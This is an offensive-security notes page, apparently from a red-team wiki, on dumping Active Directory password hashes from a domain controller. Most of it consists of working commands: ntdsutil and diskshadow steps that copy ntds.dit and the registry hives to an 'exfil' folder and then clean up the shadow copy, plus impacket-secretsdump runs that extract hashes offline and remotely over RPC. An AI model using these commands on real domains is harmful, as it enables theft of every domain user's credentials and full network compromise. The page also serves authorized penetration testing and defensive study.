Dumping Domain Controller Hashes Locally and Remotely
Dumping NTDS.dit with Active Directory users hashes

If you have no credentials, but you have access to the DC, it's possible to dump the ntds.dit using a lolbin ntdsutil.exe:
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
We can see that the ntds.dit and SYSTEM as well as SECURITY registry hives are being dumped to c:\temp:
We can then dump password hashes offline with impacket:
[email protected]~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

On Windows Server 2008+, we can use diskshadow to grab the ntdis.dit.
Create a shadowdisk.exe script instructing to create a new shadow disk copy of the disk C (where ntds.dit is located in our case) and expose it as drive Z:\
set context persistent nowriters
set metadata c:\exfil\metadata.cab
add volume c: alias trophy
expose %someAlias% z:
...and now execute the following:
mkdir c:\exfil
diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt
cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
Below shows the ntds.dit got etracted and placed into our c:\exfil folder:
Inside interactive diskshadow utility, clean up the shadow volume:
> delete shadows volume trophy
> reset

If you have credentials for an account that can log on to the DC, it's possible to dump hashes from NTDS.dit remotely via RPC protocol with impacket:
impacket-secretsdump -just-dc-ntlm offense/[email protected]

Attack Methods for Gaining Domain Admin Rights in Active Directory
Active Directory Security
DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction
Copy link
On this page
No Credentials - ntdsutil
No Credentials - diskshadow
With Credentials